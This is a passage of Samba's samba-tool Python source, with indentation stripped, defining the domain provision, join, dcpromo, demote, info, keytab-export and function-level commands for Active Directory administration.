DS_DOMAIN_FUNCTION_2003,
DS_DOMAIN_FUNCTION_2003_MIXED,
DS_DOMAIN_FUNCTION_2008,
DS_DOMAIN_FUNCTION_2008_R2,
DS_DOMAIN_FUNCTION_2012,
DS_DOMAIN_FUNCTION_2012_R2,
DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL,
DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL,
UF_WORKSTATION_TRUST_ACCOUNT,
UF_SERVER_TRUST_ACCOUNT,
UF_TRUSTED_FOR_DELEGATION,
UF_PARTIAL_SECRETS_ACCOUNT
)
from samba.provision import (
provision,
ProvisioningError,
DEFAULT_MIN_PWD_LENGTH,
setup_path
)
from samba.provision.common import (
FILL_FULL,
FILL_NT4SYNC,
FILL_DRS
)
from samba.netcmd.pso import cmd_domain_passwordsettings_pso
from samba.netcmd.domain_backup import cmd_domain_backup
from samba.common import get_string
string_version_to_constant = {
"2008_R2": DS_DOMAIN_FUNCTION_2008_R2,
"2012": DS_DOMAIN_FUNCTION_2012,
"2012_R2": DS_DOMAIN_FUNCTION_2012_R2,
}
common_provision_join_options = [
Option("--machinepass", type="string", metavar="PASSWORD",
help="choose machine password (otherwise random)"),
Option("--plaintext-secrets", action="store_true",
help="Store secret/sensitive values as plain text on disk" +
"(default is to encrypt secret/ensitive values)"),
Option("--backend-store", type="choice", metavar="BACKENDSTORE",
choices=["tdb", "mdb"],
help="Specify the database backend to be used "
"(default is %s)" % get_default_backend_store()),
Option("--backend-store-size", type="bytes", metavar="SIZE",
help="Specify the size of the backend database, currently only " +
"supported by lmdb backends (default is 8 Gb)."),
Option("--targetdir", metavar="DIR",
help="Set target directory (where to store provision)", type=str),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
]
common_join_options = [
Option("--server", help="DC to join", type=str),
Option("--site", help="site to join", type=str),
Option("--domain-critical-only",
help="only replicate critical domain objects",
action="store_true"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (this DC will not be a DNS server)",
default="SAMBA_INTERNAL"),
Option("-v", "--verbose", help="Be verbose", action="store_true")
]
common_ntvfs_options = [
Option("--use-ntvfs", help="Use NTVFS for the fileserver (default = no)",
action="store_true")
]
def get_testparm_var(testparm, smbconf, varname):
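    """Return the value of the smb.conf parameter ``varname``, as reported by
    running testparm against ``smbconf``."""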
errfile = open(os.devnull, 'w')
p = subprocess.Popen([testparm, '-s', '-l',
'--parameter-name=%s' % varname, smbconf],
stdout=subprocess.PIPE, stderr=errfile)
(out, err) = p.communicate()
errfile.close()
lines = out.split(b'\n')
if lines:
return get_string(lines[0]).strip()
return ""
try:
enable_net_export_keytab()
except ImportError:
cmd_domain_export_keytab = None
else:
class cmd_domain_export_keytab(Command):
"""Dump Kerberos keys of the domain into a keytab."""
synopsis = "%prog <keytab> [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("--principal", help="extract only this principal", type=str),
]
takes_args = ["keytab"]
def run(self, keytab, credopts=None, sambaopts=None, versionopts=None, principal=None):
lp = sambaopts.get_loadparm()
net = Net(None, lp)
net.export_keytab(keytab=keytab, principal=principal)
class cmd_domain_info(Command):
"""Print basic info about a domain and the DC passed as parameter."""
synopsis = "%prog <ip_address> [options]"
takes_options = [
]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_args = ["address"]
def run(self, address, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
try:
res = netcmd_get_domain_infos_via_cldap(lp, None, address)
except RuntimeError:
raise CommandError("Invalid IP address '" + address + "'!")
self.outf.write("Forest : %s\n" % res.forest)
self.outf.write("Domain : %s\n" % res.dns_domain)
self.outf.write("Netbios domain : %s\n" % res.domain_name)
self.outf.write("DC name : %s\n" % res.pdc_dns_name)
self.outf.write("DC netbios name : %s\n" % res.pdc_name)
self.outf.write("Server site : %s\n" % res.server_site)
self.outf.write("Client site : %s\n" % res.client_site)
class cmd_domain_provision(Command):
"""Provision a domain."""
synopsis = "%prog [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("--interactive", help="Ask for names", action="store_true"),
Option("--domain", type="string", metavar="DOMAIN",
help="NetBIOS domain name to use"),
Option("--domain-guid", type="string", metavar="GUID",
help="set domainguid (otherwise random)"),
Option("--domain-sid", type="string", metavar="SID",
help="set domainsid (otherwise random)"),
Option("--ntds-guid", type="string", metavar="GUID",
help="set NTDS object GUID (otherwise random)"),
Option("--invocationid", type="string", metavar="GUID",
help="set invocationid (otherwise random)"),
Option("--host-name", type="string", metavar="HOSTNAME",
help="set hostname"),
Option("--host-ip", type="string", metavar="IPADDRESS",
help="set IPv4 ipaddress"),
Option("--host-ip6", type="string", metavar="IP6ADDRESS",
help="set IPv6 ipaddress"),
Option("--site", type="string", metavar="SITENAME",
help="set site name"),
Option("--adminpass", type="string", metavar="PASSWORD",
help="choose admin password (otherwise random)"),
Option("--krbtgtpass", type="string", metavar="PASSWORD",
help="choose krbtgt password (otherwise random)"),
Option("--dns-backend", type="choice", metavar="NAMESERVER-BACKEND",
choices=["SAMBA_INTERNAL", "BIND9_FLATFILE", "BIND9_DLZ", "NONE"],
help="The DNS server backend. SAMBA_INTERNAL is the builtin name server (default), "
"BIND9_FLATFILE uses bind9 text database to store zone information, "
"BIND9_DLZ uses samba4 AD to store zone information, "
"NONE skips the DNS setup entirely (not recommended)",
default="SAMBA_INTERNAL"),
Option("--dnspass", type="string", metavar="PASSWORD",
help="choose dns password (otherwise random)"),
Option("--root", type="string", metavar="USERNAME",
help="choose 'root' unix username"),
Option("--nobody", type="string", metavar="USERNAME",
help="choose 'nobody' user"),
Option("--users", type="string", metavar="GROUPNAME",
help="choose 'users' group"),
Option("--blank", action="store_true",
help="do not add users or groups, just the structure"),
Option("--server-role", type="choice", metavar="ROLE",
choices=["domain controller", "dc", "member server", "member", "standalone"],
help="The server role (domain controller | dc | member server | member | standalone). Default is dc.",
default="domain controller"),
Option("--function-level", type="choice", metavar="FOR-FUN-LEVEL",
choices=["2000", "2003", "2008", "2008_R2"],
help="The domain and forest function level (2000 | 2003 | 2008 | 2008_R2 - always native). Default is (Windows) 2008_R2 Native.",
default="2008_R2"),
Option("--base-schema", type="choice", metavar="BASE-SCHEMA",
choices=["2008_R2", "2008_R2_old", "2012", "2012_R2"],
help="The base schema files to use. Default is (Windows) 2012_R2.",
default="2012_R2"),
Option("--next-rid", type="int", metavar="NEXTRID", default=1000,
help="The initial nextRid value (only needed for upgrades). Default is 1000."),
Option("--partitions-only",
help="Configure Samba's partitions, but do not modify them (ie, join a BDC)", action="store_true"),
Option("--use-rfc2307", action="store_true", help="Use AD to store posix attributes (default = no)"),
]
ntvfs_options = [
Option("--use-xattrs", type="choice", choices=["yes", "no", "auto"],
metavar="[yes|no|auto]",
help="Define if we should use the native fs capabilities or a tdb file for "
"storing attributes likes ntacl when --use-ntvfs is set. "
"auto tries to make an inteligent guess based on the user rights and system capabilities",
default="auto")
]
takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_options.extend(ntvfs_options)
takes_args = []
def run(self, sambaopts=None, versionopts=None,
interactive=None,
domain=None,
domain_guid=None,
domain_sid=None,
ntds_guid=None,
invocationid=None,
host_name=None,
host_ip=None,
host_ip6=None,
adminpass=None,
site=None,
krbtgtpass=None,
machinepass=None,
dns_backend=None,
dns_forwarder=None,
dnspass=None,
ldapadminpass=None,
root=None,
nobody=None,
users=None,
quiet=None,
blank=None,
server_role=None,
function_level=None,
next_rid=None,
partitions_only=None,
targetdir=None,
use_xattrs="auto",
use_ntvfs=False,
use_rfc2307=None,
base_schema=None,
plaintext_secrets=False,
backend_store=None,
backend_store_size=None):
self.logger = self.get_logger(name="provision", quiet=quiet)
lp = sambaopts.get_loadparm()
smbconf = lp.configfile
if dns_forwarder is not None:
suggested_forwarder = dns_forwarder
else:
suggested_forwarder = self._get_nameserver_ip()
if suggested_forwarder is None:
suggested_forwarder = "none"
if len(self.raw_argv) == 1:
interactive = True
if interactive:
from getpass import getpass
import socket
def ask(prompt, default=None):
if default is not None:
print("%s [%s]: " % (prompt, default), end=' ')
else:
print("%s: " % (prompt,), end=' ')
sys.stdout.flush()
return sys.stdin.readline().rstrip("\n") or default
try:
default = socket.getfqdn().split(".", 1)[1].upper()
except IndexError:
default = None
realm = ask("Realm", default)
if realm in (None, ""):
raise CommandError("No realm set!")
try:
default = realm.split(".")[0]
except IndexError:
default = None
domain = ask("Domain", default)
if domain is None:
raise CommandError("No domain set!")
server_role = ask("Server Role (dc, member, standalone)", "dc")
dns_backend = ask("DNS backend (SAMBA_INTERNAL, BIND9_FLATFILE, BIND9_DLZ, NONE)", "SAMBA_INTERNAL")
if dns_backend in (None, ''):
raise CommandError("No DNS backend set!")
if dns_backend == "SAMBA_INTERNAL":
dns_forwarder = ask("DNS forwarder IP address (write 'none' to disable forwarding)", suggested_forwarder)
if dns_forwarder.lower() in (None, 'none'):
suggested_forwarder = None
dns_forwarder = None
while True:
adminpassplain = getpass("Administrator password: ")
issue = self._adminpass_issue(adminpassplain)
if issue:
self.errf.write("%s.\n" % issue)
else:
adminpassverify = getpass("Retype password: ")
if adminpassplain != adminpassverify:
self.errf.write("Sorry, passwords do not match.\n")
else:
adminpass = adminpassplain
break
else:
realm = sambaopts._lp.get('realm')
if realm is None:
raise CommandError("No realm set!")
if domain is None:
raise CommandError("No domain set!")
if adminpass:
issue = self._adminpass_issue(adminpass)
if issue:
raise CommandError(issue)
else:
self.logger.info("Administrator password will be set randomly!")
if function_level == "2000":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2000
elif function_level == "2003":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2003
elif function_level == "2008":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2008
elif function_level == "2008_R2":
dom_for_fun_level = DS_DOMAIN_FUNCTION_2008_R2
if dns_backend == "SAMBA_INTERNAL" and dns_forwarder is None:
dns_forwarder = suggested_forwarder
samdb_fill = FILL_FULL
if blank:
samdb_fill = FILL_NT4SYNC
elif partitions_only:
samdb_fill = FILL_DRS
if targetdir is not None:
if not os.path.isdir(targetdir):
os.mkdir(targetdir)
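# Decide whether extended attributes can be stored natively in the
# filesystem (eadb=False) or must go into a tdb file (eadb=True).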
eadb = True
if use_xattrs == "yes":
eadb = False
elif use_xattrs == "auto" and use_ntvfs == False:
eadb = False
elif use_ntvfs == False:
raise CommandError("--use-xattrs=no requires --use-ntvfs (not supported for production use). "
"Please re-run with --use-xattrs omitted.")
elif use_xattrs == "auto" and not lp.get("posix:eadb"):
if targetdir:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(targetdir))
else:
tmpfile = tempfile.NamedTemporaryFile(dir=os.path.abspath(os.path.dirname(lp.get("private dir"))))
try:
try:
samba.ntacls.setntacl(lp, tmpfile.name,
"O:S-1-5-32G:S-1-5-32",
"S-1-5-32",
system_session_unix(),
"native")
eadb = False
except Exception:
self.logger.info("You are not root or your system does not support xattr, using tdb backend for attributes.")
finally:
tmpfile.close()
if eadb:
self.logger.info("not using extended attributes to store ACLs and other metadata. If you intend to use this provision in production, rerun the script as root on a system supporting xattrs.")
if domain_sid is not None:
domain_sid = security.dom_sid(domain_sid)
session = system_session()
if backend_store is None:
backend_store = get_default_backend_store()
try:
result = provision(self.logger,
session, smbconf=smbconf, targetdir=targetdir,
samdb_fill=samdb_fill, realm=realm, domain=domain,
domainguid=domain_guid, domainsid=domain_sid,
hostname=host_name,
hostip=host_ip, hostip6=host_ip6,
sitename=site, ntdsguid=ntds_guid,
invocationid=invocationid, adminpass=adminpass,
krbtgtpass=krbtgtpass, machinepass=machinepass,
dns_backend=dns_backend, dns_forwarder=dns_forwarder,
dnspass=dnspass, root=root, nobody=nobody,
users=users,
serverrole=server_role, dom_for_fun_level=dom_for_fun_level,
useeadb=eadb, next_rid=next_rid, lp=lp, use_ntvfs=use_ntvfs,
use_rfc2307=use_rfc2307, skip_sysvolacl=False,
base_schema=base_schema,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
except ProvisioningError as e:
raise CommandError("Provision failed", e)
result.report_logger(self.logger)
def _get_nameserver_ip(self):
"""Grab the nameserver IP address from /etc/resolv.conf."""
from os import path
RESOLV_CONF = "/etc/resolv.conf"
if not path.isfile(RESOLV_CONF):
self.logger.warning("Failed to locate %s" % RESOLV_CONF)
return None
handle = None
try:
handle = open(RESOLV_CONF, 'r')
for line in handle:
if not line.startswith('nameserver'):
continue
# we want the last non-space continuous string of the line
return line.strip().split()[-1]
finally:
if handle is not None:
handle.close()
self.logger.warning("No nameserver found in %s" % RESOLV_CONF)
def _adminpass_issue(self, adminpass):
"""Returns error string for a bad administrator password,
or None if acceptable"""
if isinstance(adminpass, bytes):
adminpass = adminpass.decode('utf8')
if len(adminpass) < DEFAULT_MIN_PWD_LENGTH:
return "Administrator password does not meet the default minimum" \
" password length requirement (%d characters)" \
% DEFAULT_MIN_PWD_LENGTH
elif not samba.check_password_quality(adminpass):
return "Administrator password does not meet the default" \
" quality standards"
else:
return None
class cmd_domain_dcpromo(Command):
"""Promote an existing domain member or NT4 PDC to an AD DC."""
synopsis = "%prog <dnsdomain> [DC|RODC] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
takes_options = []
takes_options.extend(common_join_options)
takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(common_ntvfs_options)
takes_args = ["domain", "role?"]
def run(self, domain, role=None, sambaopts=None, credopts=None,
versionopts=None, server=None, site=None, targetdir=None,
domain_critical_only=False, machinepass=None,
use_ntvfs=False, dns_backend=None,
quiet=False, verbose=False, plaintext_secrets=False,
backend_store=None, backend_store_size=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
netbios_name = lp.get("netbios name")
if role is not None:
role = role.upper()
if role == "DC":
join_DC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
promote_existing=True, plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
elif role == "RODC":
join_RODC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs, dns_backend=dns_backend,
promote_existing=True, plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
else:
raise CommandError("Invalid role '%s' (possible values: DC, RODC)" % role)
class cmd_domain_join(Command):
"""Join domain as either member or backup domain controller."""
synopsis = "%prog <dnsdomain> [DC|RODC|MEMBER] [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"versionopts": options.VersionOptions,
"credopts": options.CredentialsOptions,
}
ntvfs_options = [
Option(
"--use-ntvfs", help="Use NTVFS for the fileserver (default = no)",
action="store_true")
]
takes_options = []
takes_options.extend(common_join_options)
takes_options.extend(common_provision_join_options)
if samba.is_ntvfs_fileserver_built():
takes_options.extend(ntvfs_options)
takes_args = ["domain", "role?"]
def run(self, domain, role=None, sambaopts=None, credopts=None,
versionopts=None, server=None, site=None, targetdir=None,
domain_critical_only=False, machinepass=None,
use_ntvfs=False, dns_backend=None,
quiet=False, verbose=False,
plaintext_secrets=False,
backend_store=None, backend_store_size=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
netbios_name = lp.get("netbios name")
if role is not None:
role = role.upper()
if role is None or role == "MEMBER":
(join_password, sid, domain_name) = net.join_member(
domain, netbios_name, LIBNET_JOIN_AUTOMATIC,
machinepass=machinepass)
self.errf.write("Joined domain %s (%s)\n" % (domain_name, sid))
elif role == "DC":
join_DC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
elif role == "RODC":
join_RODC(logger=logger, server=server, creds=creds, lp=lp, domain=domain,
site=site, netbios_name=netbios_name, targetdir=targetdir,
domain_critical_only=domain_critical_only,
machinepass=machinepass, use_ntvfs=use_ntvfs,
dns_backend=dns_backend,
plaintext_secrets=plaintext_secrets,
backend_store=backend_store,
backend_store_size=backend_store_size)
else:
raise CommandError("Invalid role '%s' (possible values: MEMBER, DC, RODC)" % role)
class cmd_domain_demote(Command):
"""Demote ourselves from the role of Domain Controller."""
synopsis = "%prog [options]"
takes_options = [
Option("--server", help="writable DC to write demotion changes on", type=str),
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("--remove-other-dead-server", help="Dead DC (name or NTDS GUID) "
"to remove ALL references to (rather than this DC)", type=str),
Option("-q", "--quiet", help="Be quiet", action="store_true"),
Option("-v", "--verbose", help="Be verbose", action="store_true"),
]
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
def run(self, sambaopts=None, credopts=None,
versionopts=None, server=None,
remove_other_dead_server=None, H=None,
verbose=False, quiet=False):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
net = Net(creds, lp, server=credopts.ipaddress)
logger = self.get_logger(verbose=verbose, quiet=quiet)
if remove_other_dead_server is not None:
if server is not None:
samdb = SamDB(url="ldap://%s" % server,
session_info=system_session(),
credentials=creds, lp=lp)
else:
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
try:
remove_dc.remove_dc(samdb, logger, remove_other_dead_server)
except remove_dc.DemoteException as err:
raise CommandError("Demote failed: %s" % err)
return
netbios_name = lp.get("netbios name")
samdb = SamDB(url=H, session_info=system_session(), credentials=creds, lp=lp)
if not server:
res = samdb.search(expression='(&(objectClass=computer)(serverReferenceBL=*))', attrs=["dnsHostName", "name"])
if len(res) == 0:
raise CommandError("Unable to search for servers")
if len(res) == 1:
raise CommandError("You are the last server in the domain")
server = None
for e in res:
if str(e["name"]).lower() != netbios_name.lower():
server = e["dnsHostName"]
break
ntds_guid = samdb.get_ntds_GUID()
msg = samdb.search(base=str(samdb.get_config_basedn()),
scope=ldb.SCOPE_SUBTREE, expression="(objectGUID=%s)" % ntds_guid,
attrs=['options'])
if len(msg) == 0 or "options" not in msg[0]:
raise CommandError("Failed to find options on %s" % ntds_guid)
ntds_dn = msg[0].dn
dsa_options = int(str(msg[0]['options']))
res = samdb.search(expression="(fSMORoleOwner=%s)" % str(ntds_dn),
controls=["search_options:1:2"])
if len(res) != 0:
raise CommandError("Current DC is still the owner of %d role(s), "
"use the role command to transfer roles to "
"another DC" %
len(res))
self.errf.write("Using %s as partner server for the demotion\n" %
server)
(drsuapiBind, drsuapi_handle, supportedExtensions) = drsuapi_connect(server, lp, creds)
self.errf.write("Deactivating inbound replication\n")
nmsg = ldb.Message()
nmsg.dn = msg[0].dn
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
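# Set the DISABLE_INBOUND_REPL bit so no further changes replicate
# into this DC while the demotion is in progress.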
dsa_options |= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
self.errf.write("Asking partner server %s to synchronize from us\n"
% server)
for part in (samdb.get_schema_basedn(),
samdb.get_config_basedn(),
samdb.get_root_basedn()):
nc = drsuapi.DsReplicaObjectIdentifier()
nc.dn = str(part)
req1 = drsuapi.DsReplicaSyncRequest1()
req1.naming_context = nc
req1.options = drsuapi.DRSUAPI_DRS_WRIT_REP
req1.source_dsa_guid = misc.GUID(ntds_guid)
try:
drsuapiBind.DsReplicaSync(drsuapi_handle, 1, req1)
except RuntimeError as e1:
(werr, string) = e1.args
if werr == werror.WERR_DS_DRA_NO_REPLICA:
pass
else:
self.errf.write(
"Error while replicating out last local changes from '%s' for demotion, "
"re-enabling inbound replication\n" % part)
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while sending a DsReplicaSync for partition '%s'" % str(part), string)
try:
remote_samdb = SamDB(url="ldap://%s" % server,
session_info=system_session(),
credentials=creds, lp=lp)
self.errf.write("Changing userControl and container\n")
res = remote_samdb.search(base=str(remote_samdb.domain_dn()),
expression="(&(objectClass=user)(sAMAccountName=%s$))" %
netbios_name.upper(),
attrs=["userAccountControl"])
dc_dn = res[0].dn
uac = int(str(res[0]["userAccountControl"]))
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while changing account control", e)
if len(res) != 1:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Unable to find object with samaccountName = %s$"
" in the remote dc" % netbios_name.upper())
olduac = uac
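# Strip the DC-specific flags and mark the machine account as a
# plain workstation (domain member) account.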
uac &= ~(UF_SERVER_TRUST_ACCOUNT |
UF_TRUSTED_FOR_DELEGATION |
UF_PARTIAL_SECRETS_ACCOUNT)
uac |= UF_WORKSTATION_TRUST_ACCOUNT
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
try:
remote_samdb.modify(msg)
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
raise CommandError("Error while changing account control", e)
parent = msg.dn.parent()
dc_name = res[0].dn.get_rdn_value()
rdn = "CN=%s" % dc_name
# Let's move to the Computer container
i = 0
newrdn = str(rdn)
computer_dn = ldb.Dn(remote_samdb, "CN=Computers,%s" % str(remote_samdb.domain_dn()))
res = remote_samdb.search(base=computer_dn, expression=rdn, scope=ldb.SCOPE_ONELEVEL)
if len(res) != 0:
res = remote_samdb.search(base=computer_dn, expression="%s-%d" % (rdn, i),
scope=ldb.SCOPE_ONELEVEL)
while len(res) != 0 and i < 100:
i = i + 1
res = remote_samdb.search(base=computer_dn, expression="%s-%d" % (rdn, i),
scope=ldb.SCOPE_ONELEVEL)
if i == 100:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
raise CommandError("Unable to find a slot for renaming %s,"
" all names from %s-1 to %s-%d seemed used" %
(str(dc_dn), rdn, rdn, i - 9))
newrdn = "%s-%d" % (rdn, i)
try:
newdn = ldb.Dn(remote_samdb, "%s,%s" % (newrdn, str(computer_dn)))
remote_samdb.rename(dc_dn, newdn)
except Exception as e:
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = dc_dn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
raise CommandError("Error while renaming %s to %s" % (str(dc_dn), str(newdn)), e)
server_dsa_dn = samdb.get_serverName()
domain = remote_samdb.get_root_basedn()
try:
req1 = drsuapi.DsRemoveDSServerRequest1()
req1.server_dn = str(server_dsa_dn)
req1.domain_dn = str(domain)
req1.commit = 1
drsuapiBind.DsRemoveDSServer(drsuapi_handle, 1, req1)
except RuntimeError as e3:
(werr, string) = e3.args
if not (dsa_options & DS_NTDSDSA_OPT_DISABLE_OUTBOUND_REPL) and not samdb.am_rodc():
self.errf.write(
"Error while demoting, re-enabling inbound replication\n")
dsa_options ^= DS_NTDSDSA_OPT_DISABLE_INBOUND_REPL
nmsg["options"] = ldb.MessageElement(str(dsa_options), ldb.FLAG_MOD_REPLACE, "options")
samdb.modify(nmsg)
msg = ldb.Message()
msg.dn = newdn
msg["userAccountControl"] = ldb.MessageElement("%d" % uac,
ldb.FLAG_MOD_REPLACE,
"userAccountControl")
remote_samdb.modify(msg)
remote_samdb.rename(newdn, dc_dn)
if werr == werror.WERR_DS_DRA_NO_REPLICA:
raise CommandError("The DC %s is not present on (already "
"removed from) the remote server: %s" %
(server_dsa_dn, e3))
else:
raise CommandError("Error while sending a removeDsServer "
"of %s: %s" %
(server_dsa_dn, e3))
remove_dc.remove_sysvol_references(remote_samdb, logger, dc_name)
# These are objects under the computer account that should be deleted
for s in ("CN=Enterprise,CN=NTFRS Subscriptions",
"CN=%s, CN=NTFRS Subscriptions" % lp.get("realm"),
"CN=Domain system Volumes (SYSVOL Share), CN=NTFRS Subscriptions",
"CN=NTFRS Subscriptions"):
try:
remote_samdb.delete(ldb.Dn(remote_samdb,
"%s,%s" % (s, str(newdn))))
except ldb.LdbError:
pass
# get dns host name for target server to demote, remove dns references
remove_dc.remove_dns_references(remote_samdb, logger, samdb.host_dns_name(),
ignore_no_name=True)
self.errf.write("Demote successful\n")
class cmd_domain_level(Command):
"""Raise domain and forest function levels."""
synopsis = "%prog (show|raise <options>) [options]"
takes_optiongroups = {
"sambaopts": options.SambaOptions,
"credopts": options.CredentialsOptions,
"versionopts": options.VersionOptions,
}
takes_options = [
Option("-H", "--URL", help="LDB URL for database or target server", type=str,
metavar="URL", dest="H"),
Option("-q", "--quiet", help="Be quiet", action="store_true"), # unused
Option("--forest-level", type="choice", choices=["2003", "2008", "2008_R2", "2012", "2012_R2"],
help="The forest function level (2003 | 2008 | 2008_R2 | 2012 | 2012_R2)"),
Option("--domain-level", type="choice", choices=["2003", "2008", "2008_R2", "2012", "2012_R2"],
help="The domain function level (2003 | 2008 | 2008_R2 | 2012 | 2012_R2)")
]
takes_args = ["subcommand"]
def run(self, subcommand, H=None, forest_level=None, domain_level=None,
quiet=False, credopts=None, sambaopts=None, versionopts=None):
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp, fallback_machine=True)
samdb = SamDB(url=H, session_info=system_session(),
credentials=creds, lp=lp)
domain_dn = samdb.domain_dn()
res_forest = samdb.search("CN=Partitions,%s" % samdb.get_config_basedn(),
scope=ldb.SCOPE_BASE, attrs=["msDS-Behavior-Version"])
assert len(res_forest) == 1
res_domain = samdb.search(domain_dn, scope=ldb.SCOPE_BASE,
attrs=["msDS-Behavior-Version", "nTMixedDomain"])
assert len(res_domain) == 1
res_dc_s = samdb.search("CN=Sites,%s" % samdb.get_config_basedn(),
scope=ldb.SCOPE_SUBTREE, expression="(objectClass=nTDSDSA)",
attrs=["msDS-Behavior-Version"])
assert len(res_dc_s) >= 1
# default values, since "msDS-Behavior-Version" does not exist on Windows 2000 AD
level_forest = DS_DOMAIN_FUNCTION_2000
level_domain = DS_DOMAIN_FUNCTION_2000
if "msDS-Behavior-Version" in res_forest[0]:
level_forest = int(res_forest[0]["msDS-Behavior-Version"][0])
if "msDS-Behavior-Version" in res_domain[0]:
level_domain = int(res_domain[0]["msDS-Behavior-Version"][0])
level_domain_mixed = int(res_domain[0]["nTMixedDomain"][0])
min_level_dc = None
for msg in res_dc_s:
if "msDS-Behavior-Version" in msg:
if min_level_dc is None or int(msg["msDS-Behavior-Version"][0]) < min_level_dc:
min_level_dc = int(msg["msDS-Behavior-Version"][0])
else:
min_level_dc = DS_DOMAIN_FUNCTION_2000
# 2000 is the lowest possible level, so no need to look further
break
